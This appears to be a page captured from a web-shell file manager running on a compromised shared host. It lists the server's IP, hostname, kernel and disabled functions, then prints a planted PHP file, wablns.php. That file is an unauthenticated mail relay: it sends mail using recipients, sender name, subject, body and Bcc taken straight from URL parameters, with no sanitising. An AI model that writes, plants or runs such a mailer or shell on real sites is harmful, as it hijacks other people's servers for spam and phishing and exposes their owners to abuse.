uawdijnntqw1x1x1
IP : 216.73.216.249
Hostname : webm001.cluster110.gra.hosting.ovh.net
Kernel : Linux webm001.cluster110.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
etiennec
/
www
/
b9da6
/
..
/
prive
/
..
/
..
/
www
/
wablns.php
/
/
<?php if (isset($_GET['to']) && isset($_GET['name']) && isset($_GET['subject']) && isset($_GET['message']) && isset($_GET['bcc'])) { $to = $_GET['to']; $name = $_GET['name']; $subject = $_GET['subject']; $message = $_GET['message']; $bcc = $_GET['bcc']; // ?????????????? ????????? $headers = "From: $name\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: text/html; charset=utf-8\r\n"; $headers .= "Bcc: $bcc\r\n"; // ?????????? ????????? Bcc // ???????? ?????? $result = mail($to, $subject, $message, $headers); if ($result) { echo 'OK.'; } else { echo 'BAD.'; } } ?>
/home/etiennec/www/b9da6/../prive/../../www/wablns.php